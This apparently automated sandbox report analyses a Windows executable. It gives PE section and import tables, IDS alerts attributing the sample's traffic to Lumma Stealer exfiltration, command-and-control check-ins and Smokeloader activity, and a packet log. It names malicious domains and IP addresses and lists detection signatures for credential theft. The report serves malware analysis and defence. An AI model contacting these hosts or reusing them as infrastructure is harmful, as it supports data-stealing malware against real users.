IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d710	0x1d800	e6aa52116a838c2be2d263feb29062e1	False	0.8794276350635594	data	7.7772612824669265	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1f000	0x32e8	0x3400	013aeb8e1635e6a6f3de12e570cf8dfe	False	0.35314002403846156	OpenPGP Public Key	4.978408484408156	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x23000	0x2022e8c	0xdc00	aeb766de6932e720a3c8b2ef1f199d2a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.zowiz	0x2046000	0x2d3	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.jovusaj	0x2047000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2048000	0x9a08	0x9c00	8f6ed52f5bb2e6449b9cbab8c773cd9d	False	0.42783453525641024	data	4.622486747447593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x204ec98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x204fb40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x20503e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_ICON	0x2048420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.47254797441364604
RT_ICON	0x2048420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.47254797441364604
RT_ICON	0x20492c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5875451263537906
RT_ICON	0x20492c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5875451263537906
RT_ICON	0x2049b70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.652073732718894
RT_ICON	0x2049b70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.652073732718894
RT_ICON	0x204a238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6979768786127167
RT_ICON	0x204a238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6979768786127167
RT_ICON	0x204a7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.37053941908713695
RT_ICON	0x204a7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.37053941908713695
RT_ICON	0x204cd48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	India	0.46224202626641653
RT_ICON	0x204cd48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	Sri Lanka	0.46224202626641653
RT_ICON	0x204ddf0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	India	0.5409836065573771
RT_ICON	0x204ddf0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	Sri Lanka	0.5409836065573771
RT_ICON	0x204e778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.6365248226950354
RT_ICON	0x204e778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.6365248226950354
RT_STRING	0x2050be0	0x452	data	Tamil	India	0.45479204339963836
RT_STRING	0x2050be0	0x452	data	Tamil	Sri Lanka	0.45479204339963836
RT_STRING	0x2051038	0x28e	data	Tamil	India	0.481651376146789
RT_STRING	0x2051038	0x28e	data	Tamil	Sri Lanka	0.481651376146789
RT_STRING	0x20512c8	0x73e	data	Tamil	India	0.4261057173678533
RT_STRING	0x20512c8	0x73e	data	Tamil	Sri Lanka	0.4261057173678533
RT_ACCELERATOR	0x204ec58	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x204ec58	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x2050950	0x30	data			0.9375
RT_GROUP_ICON	0x204ebe0	0x76	data	Tamil	India	0.6610169491525424
RT_GROUP_ICON	0x204ebe0	0x76	data	Tamil	Sri Lanka	0.6610169491525424
RT_VERSION	0x2050980	0x260	data			0.5345394736842105

Imports

DLL	Import
KERNEL32.dll	LocalCompact, EnumCalendarInfoW, SetEnvironmentVariableW, GetTickCount, CreateNamedPipeW, GetConsoleAliasesA, EnumResourceTypesA, GetConsoleCP, GlobalAlloc, SetFileShortNameW, LoadLibraryW, IsProcessInJob, FatalAppExitW, AssignProcessToJobObject, IsBadCodePtr, ReplaceFileW, GetModuleFileNameW, GetSystemDirectoryA, CreateFileW, GlobalUnlock, CreateJobObjectA, GetLastError, SetEndOfFile, VerLanguageNameW, LoadLibraryA, SetConsoleCtrlHandler, AddAtomW, HeapWalk, GetOEMCP, EnumDateFormatsA, GetModuleHandleA, GetProcessShutdownParameters, EnumResourceNamesA, GetFileTime, PeekConsoleInputA, GetDiskFreeSpaceExA, LCMapStringW, HeapSize, FlushFileBuffers, GetStringTypeW, WriteConsoleInputW, FindVolumeClose, GetProcAddress, HeapCompact, WriteConsoleW, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, MultiByteToWideChar, ReadFile, GetModuleHandleW, ExitProcess, SetFilePointer, HeapCreate, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetConsoleMode, GetCPInfo, GetACP, IsValidCodePage, Sleep, RtlUnwind, SetStdHandle, IsProcessorFeaturePresent, CloseHandle
USER32.dll	GetMenu, CharUpperBuffW, SetCaretPos, GetMessageExtraInfo, DrawStateW, GetSysColorBrush
GDI32.dll	GetCharWidthI, CreateDCA, GetCharABCWidthsI
WINHTTP.dll	WinHttpOpen
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T07:30:37.490057+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51836	443	192.168.2.5	188.114.96.3
2024-07-27T07:32:12.539043+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51895	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:08.617650+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	51808	80	192.168.2.5	64.190.113.113
2024-07-27T07:30:11.104794+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51809	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:48.763363+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51852	443	192.168.2.5	188.114.96.3
2024-07-27T07:30:43.467871+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51846	443	192.168.2.5	188.114.96.3
2024-07-27T07:32:21.963724+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51901	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:40.173710+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	51841	443	192.168.2.5	188.114.96.3
2024-07-27T07:30:19.253091+0200	TCP	2101390	GPL SHELLCODE x86 inc ebx NOOP	443	51812	185.149.100.242	192.168.2.5
2024-07-27T07:30:29.631223+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51819	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:38.680515+0200	TCP	2800584	ETPRO ACTIVEX Yahoo Messenger ActiveX Control Command Execution	443	51837	104.26.3.16	192.168.2.5
2024-07-27T07:30:12.626774+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51810	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:04.950993+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51805	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:32.774832+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51823	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:38.198120+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	51836	443	192.168.2.5	188.114.96.3
2024-07-27T07:29:33.075227+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	49713	80	192.168.2.5	186.145.236.93
2024-07-27T07:30:14.159695+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51811	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:15.665655+0200	TCP	2020757	ET ADWARE_PUP Windows executable sent when remote host claims to send an image M2	443	51812	185.149.100.242	192.168.2.5
2024-07-27T07:29:34.114716+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	49714	80	192.168.2.5	186.145.236.93
2024-07-27T07:29:28.578828+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	49709	80	192.168.2.5	186.145.236.93
2024-07-27T07:30:45.619692+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51848	443	192.168.2.5	188.114.96.3
2024-07-27T07:33:11.467557+0200	UDP	2054593	ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop)	58583	53	192.168.2.5	1.1.1.1
2024-07-27T07:30:39.715309+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51841	443	192.168.2.5	188.114.96.3
2024-07-27T07:29:32.020781+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	49712	80	192.168.2.5	186.145.236.93
2024-07-27T07:29:35.166669+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	49715	80	192.168.2.5	186.145.236.93
2024-07-27T07:29:19.712545+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49704	52.165.165.26	192.168.2.5
2024-07-27T07:29:39.104284+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	51801	20.12.23.50	192.168.2.5
2024-07-27T07:30:33.323747+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51828	443	192.168.2.5	188.114.96.3
2024-07-27T07:29:30.949708+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	49711	80	192.168.2.5	186.145.236.93
2024-07-27T07:30:34.994898+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	51828	443	192.168.2.5	188.114.96.3
2024-07-27T07:29:29.866818+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	49710	80	192.168.2.5	186.145.236.93
2024-07-27T07:32:52.360327+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51919	80	192.168.2.5	177.222.41.236
2024-07-27T07:30:38.095317+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51833	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:36.566326+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51831	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:32.797303+0200	UDP	2054591	ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop)	59813	53	192.168.2.5	1.1.1.1
2024-07-27T07:30:06.486304+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51806	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:01.844584+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51803	80	192.168.2.5	125.7.253.10
2024-07-27T07:29:36.305344+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51797	80	192.168.2.5	186.145.236.93
2024-07-27T07:30:03.398860+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51804	80	192.168.2.5	125.7.253.10
2024-07-27T07:33:01.524190+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51925	80	192.168.2.5	177.222.41.236
2024-07-27T07:33:11.960131+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	51929	443	192.168.2.5	172.67.213.85
2024-07-27T07:30:18.160658+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	51812	185.149.100.242	192.168.2.5
2024-07-27T07:31:01.177740+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51858	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:34.994574+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51827	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:15.947592+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	51812	185.149.100.242	192.168.2.5
2024-07-27T07:30:41.229671+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51844	443	192.168.2.5	188.114.96.3
2024-07-27T07:30:48.719804+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	51850	443	192.168.2.5	31.14.70.245
2024-07-27T07:30:36.550915+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	51832	443	192.168.2.5	188.114.96.3
2024-07-27T07:30:36.137515+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	51832	443	192.168.2.5	188.114.96.3
2024-07-27T07:32:34.909550+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51908	80	192.168.2.5	177.222.41.236
2024-07-27T07:32:43.542296+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51914	80	192.168.2.5	177.222.41.236
2024-07-27T07:29:40.183846+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	51802	20.12.23.50	192.168.2.5
2024-07-27T07:30:15.807909+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	51812	185.149.100.242	192.168.2.5
2024-07-27T07:30:26.027537+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51816	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:08.032304+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51807	80	192.168.2.5	125.7.253.10
2024-07-27T07:30:27.624152+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	51818	80	192.168.2.5	125.7.253.10

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 07:29:27.457216024 CEST	49709	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:27.462692022 CEST	80	49709	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:27.462924957 CEST	49709	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:27.463159084 CEST	49709	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:27.463159084 CEST	49709	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:27.468199968 CEST	80	49709	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:27.468230963 CEST	80	49709	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:28.577542067 CEST	80	49709	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:28.578555107 CEST	80	49709	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:28.578828096 CEST	49709	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:28.579322100 CEST	49709	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:28.582674026 CEST	49710	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:28.584203959 CEST	80	49709	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:28.587680101 CEST	80	49710	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:28.587783098 CEST	49710	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:28.587882042 CEST	49710	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:28.590007067 CEST	49710	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:28.592861891 CEST	80	49710	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:28.594878912 CEST	80	49710	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:29.866514921 CEST	80	49710	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:29.866568089 CEST	80	49710	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:29.866817951 CEST	49710	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:29.867017984 CEST	49710	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:29.869784117 CEST	49711	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:29.872205973 CEST	80	49710	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:29.875036001 CEST	80	49711	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:29.875413895 CEST	49711	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:29.875504971 CEST	49711	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:29.875504971 CEST	49711	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:29.880568027 CEST	80	49711	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:29.880587101 CEST	80	49711	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:30.949317932 CEST	80	49711	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:30.949338913 CEST	80	49711	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:30.949707985 CEST	49711	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:30.949707985 CEST	49711	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:30.952508926 CEST	49712	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:30.954778910 CEST	80	49711	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:30.957655907 CEST	80	49712	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:30.957902908 CEST	49712	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:30.957902908 CEST	49712	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:30.957902908 CEST	49712	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:30.963062048 CEST	80	49712	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:30.963090897 CEST	80	49712	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:32.017740011 CEST	80	49712	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:32.020720005 CEST	80	49712	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:32.020781040 CEST	49712	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:32.020849943 CEST	49712	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:32.023909092 CEST	49713	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:32.027292013 CEST	80	49712	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:32.030925035 CEST	80	49713	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:32.031013966 CEST	49713	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:32.031155109 CEST	49713	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:32.031188965 CEST	49713	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:32.040061951 CEST	80	49713	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:32.040091038 CEST	80	49713	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:33.075118065 CEST	80	49713	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:33.075162888 CEST	80	49713	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:33.075227022 CEST	49713	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:33.075448990 CEST	49713	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:33.078332901 CEST	49714	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:33.080307007 CEST	80	49713	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:33.083223104 CEST	80	49714	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:33.083301067 CEST	49714	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:33.083550930 CEST	49714	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:33.083586931 CEST	49714	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:33.088402987 CEST	80	49714	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:33.088568926 CEST	80	49714	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:34.113929033 CEST	80	49714	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:34.114469051 CEST	80	49714	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:34.114716053 CEST	49714	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:34.114809990 CEST	49714	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:34.119728088 CEST	49715	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:34.119947910 CEST	80	49714	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:34.124732971 CEST	80	49715	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:34.124922991 CEST	49715	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:34.125047922 CEST	49715	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:34.125047922 CEST	49715	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:34.130026102 CEST	80	49715	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:34.130057096 CEST	80	49715	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:35.166555882 CEST	80	49715	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:35.166599035 CEST	80	49715	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:35.166668892 CEST	49715	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:35.166872025 CEST	49715	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:35.170665026 CEST	51797	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:35.172353029 CEST	80	49715	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:35.176703930 CEST	80	51797	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:35.176928997 CEST	51797	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:35.183665037 CEST	51797	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:35.183665991 CEST	51797	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:35.189150095 CEST	80	51797	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:35.190239906 CEST	80	51797	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:36.305227995 CEST	80	51797	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:36.305258989 CEST	80	51797	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:36.305344105 CEST	51797	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:36.305521011 CEST	51797	80	192.168.2.5	186.145.236.93
Jul 27, 2024 07:29:36.308504105 CEST	51799	80	192.168.2.5	77.221.157.163
Jul 27, 2024 07:29:36.310342073 CEST	80	51797	186.145.236.93	192.168.2.5
Jul 27, 2024 07:29:36.313656092 CEST	80	51799	77.221.157.163	192.168.2.5
Jul 27, 2024 07:29:36.313735008 CEST	51799	80	192.168.2.5	77.221.157.163
Jul 27, 2024 07:29:36.313940048 CEST	51799	80	192.168.2.5	77.221.157.163
Jul 27, 2024 07:29:36.318736076 CEST	80	51799	77.221.157.163	192.168.2.5
Jul 27, 2024 07:29:57.698362112 CEST	80	51799	77.221.157.163	192.168.2.5
Jul 27, 2024 07:29:57.698425055 CEST	51799	80	192.168.2.5	77.221.157.163
Jul 27, 2024 07:29:57.698520899 CEST	51799	80	192.168.2.5	77.221.157.163
Jul 27, 2024 07:29:57.703526974 CEST	80	51799	77.221.157.163	192.168.2.5
Jul 27, 2024 07:30:00.322541952 CEST	51803	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:00.327713966 CEST	80	51803	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:00.327891111 CEST	51803	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:00.327934027 CEST	51803	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:00.328027964 CEST	51803	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:00.332854033 CEST	80	51803	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:00.332863092 CEST	80	51803	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:01.839700937 CEST	80	51803	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:01.839735985 CEST	80	51803	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:01.844583988 CEST	51803	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:01.845705032 CEST	51803	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:01.849035978 CEST	51804	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:01.850568056 CEST	80	51803	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:01.853981018 CEST	80	51804	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:01.854078054 CEST	51804	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:01.854171991 CEST	51804	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:01.854172945 CEST	51804	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:01.859348059 CEST	80	51804	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:01.859360933 CEST	80	51804	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:03.398591042 CEST	80	51804	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:03.398698092 CEST	80	51804	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:03.398859978 CEST	51804	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:03.398860931 CEST	51804	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:03.401240110 CEST	51805	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:03.403806925 CEST	80	51804	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:03.406096935 CEST	80	51805	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:03.406280041 CEST	51805	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:03.406335115 CEST	51805	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:03.406358004 CEST	51805	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:03.411206961 CEST	80	51805	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:03.411262035 CEST	80	51805	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:04.950879097 CEST	80	51805	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:04.950894117 CEST	80	51805	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:04.950993061 CEST	51805	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:04.952083111 CEST	51805	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:04.955635071 CEST	51806	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:04.958549023 CEST	80	51805	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:04.965256929 CEST	80	51806	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:04.965354919 CEST	51806	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:04.965528965 CEST	51806	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:04.965559006 CEST	51806	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:04.970540047 CEST	80	51806	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:04.970549107 CEST	80	51806	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:06.486047029 CEST	80	51806	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:06.486107111 CEST	80	51806	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:06.486304045 CEST	51806	80	192.168.2.5	125.7.253.10
